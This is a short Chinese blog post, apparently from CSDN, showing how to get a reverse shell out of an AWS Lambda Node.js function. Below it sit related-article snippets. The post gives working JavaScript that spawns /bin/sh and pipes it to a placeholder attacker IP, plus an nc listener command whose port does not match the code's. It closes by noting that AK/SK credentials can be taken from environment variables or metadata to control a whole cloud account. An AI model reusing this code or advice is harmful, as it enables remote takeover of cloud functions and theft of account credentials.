js获取ip_AWS Lambda Node.js 反弹shell

最新推荐文章于 2024-02-08 18:18:38 发布
最新推荐文章于 2024-02-08 18:18:38 发布
阅读量122 收藏
点赞数
文章标签: js获取ip

df4ac62775612a25f490005b605c2d26.png

PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。

0x00 前言

原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。

0x01 被攻击端

直接套到lambda函数里就行了

(function(){
    var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "此处替换为攻击端IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

0x02 攻击端

nc -lvnp 8820

4009b7e027077bb3ce59f97e68db8385.png

0x03 后记

这就就是云服务接管比直接的服务器被控的危害更大,就是可以在环境变量或者元数据中拿AKSK,然后权限配置不当的话,可以直接控了整个云账号了。

0x04 参考链接

  • 你和目标只差一个shell的距离
  • AWS LambdaのOSがAmazon Linux 2に変わっていたから中身を覗いてみた
weixin_39641231
关注
node-custom-lambda:AWS Lambda的自定义运行时以执行Node.js v10.x或v12.x中的功能
05-01
适用于AWS LambdaNode.js 10.x和12.x AWS Lambda的以执行Node.js 10.x或12.x中的功能入门另存为index.js : exports . handler = async ( event , context ) => { console . log ( `Hi from Node.js ${ process . ...
利用js文件反弹shell
chaojixiaojingang
03-17 1万+
1.环境 攻击机:Kali 192.168.42.138 靶机:Win7 192.168.42.139 2.安装工具ps1encode 下载地址:https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.git 3. 利用js文件反弹shell 先利用ps1encode生成js payload ./ps1encode.rb --LHOS
反弹shell汇总
chang113的博客
06-12 779
反弹shell整理
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2867
如何实现反弹shell检测?
ctfshow—Node.js漏洞总结
cosmoslin的博客
12-27 3932
1 Js大小写绕过 ctfshow web334 下载源码 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; }); }; 需要以账户ctfshow,密码123456登录
terraform_lambda_zip:用于创建Python或NodeJS项目的AWS Lambda zipfile的Terraform模块
04-11
Terraform-Lambda-Zip 这是一个Terraform模块,它实现了必要的移动部件,以采取包含Python或Node项目的路径,并进入.zip有效负载以部署到AWS Lambda。 它要求您安装以下软件包: jq pyenv openssl BSD md5或Linux md...
lambda-mqtt-test:测试从 AWS Lambda 函数打开 MQTT 连接
07-09
我们使用以下 npm 模块为 Node.js 实现 MQTT 客户端: 我们需要一个 MQTT CLI 客户端。 我们可以使用 Mosquitto MQTT 代理附带的一个: 或者我们可以使用mqtt npm 模块附带的 MQTT CLI 客户端(更容易安装): ...
serverless-nodejs:在五分钟或更短的时间内引导一个新的Node.js无服务器项目
03-31
无服务器Node.js项目框架 AWS Lambda上的Node.js无服务器项目的程序包框架。描述在五分钟或更短的时间内引导一个新的Node.js Serverless项目。特征使用在下部署到 。 的包结构。 使用快速,可靠和安全的依赖项管理。...
lambci:基于AWS Lambda的持续集成系统
02-21
注意:此存储库处于维护模式,因为我们评估了是否可能会提供更好的体验 LambCI 无服务器持续集成 使用以下方法自动化测试和部署: ...Node.js 12.x(包括npm / npx ) Python 3.6(包括pip ) Gcc 7.2(包括c
aws-lambda-myip:返回客户端IP地址的lambda函数(与API网关一起使用)
05-19
Aws-lambda-myip 返回客户端IP地址的lambda函数(与API网关一起使用) 其他资源 lambda示例事件 { "ip": "99.99.99.98" } #### API网关配置: #####资源创建/ GetCallerIP-GET ######方法要求 * Auth: NONE * Headers: X-Forwarded-For ######集成请求 * Type: LAMBDA * Region: eu-west-1 * Mapping Templates: * Content-Type: application/json * Template: ``` { "caller_ip" : "$input.params('X-Forwarded-For')", "Bod
nodejs获取本机内网和外网ip地址的实现代码
10-25
主要介绍了nodejs获取本机内网和外网ip地址的实现代码,需要的朋友可以参考下
反弹shell初识
无痕的博客
11-01 4160
反弹shell的指令与演示
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 439
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
Log4j2漏洞(二)3种方式复现反弹shell
最新发布
02-08 1772
Log4j2漏洞(二)3种方式复现反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易现的,复现时按需要选择,如果是学习我建议都学习下。
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
关于jsshell的尝试
无心的博客
05-04 2845
以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。 当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点 凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示 可以发现js的代码是可以成功执行的,就可以通过了这个方法...
AWS Lambda 常见问题
逍遥绝情的博客
06-01 6730
一般性问题 问:什么是 AWS Lambda?通过 AWS Lambda,无需配置或管理服务器即可运行代码。您只需按消耗的计算时间付费 – 代码未运行时不产生费用。借助 Lambda,您几乎可以为任何类型的应用程序或后端服务运行代码,而且全部无需管理。只需上传您的代码,Lambda 会处理运行和扩展高可用性代码所需的一切工作。您可以将您的代码设置为自动从其他 AWS 服务触发,或者直接从任何 Web
JS探测内网是否存在bash漏洞,反弹shell
Jiajia2017的博客
11-26 211
来t00ls几天啦,也没时间写原创。  --(本人首发土司啦。)最近看到老外一篇文章,觉得很不错。测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西。搞APT应该用得到啦。测试过程:老外发的一个Poc我内网搭建测试先监听了本地250端口然后搭建之后访问 1 h...
Python库 pulumi_aws-4.36.0a*** 使用指南
资源摘要信息:"pulumi_aws-4.36.0a***.tar.gz是一个Python库,它允许开发者使用Python语言来管理AWS(亚马逊网络服务)资源。这个库是Pulumi工具的一部分,Pulumi是一个开源的基础设施即代码(Infrastructure as ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值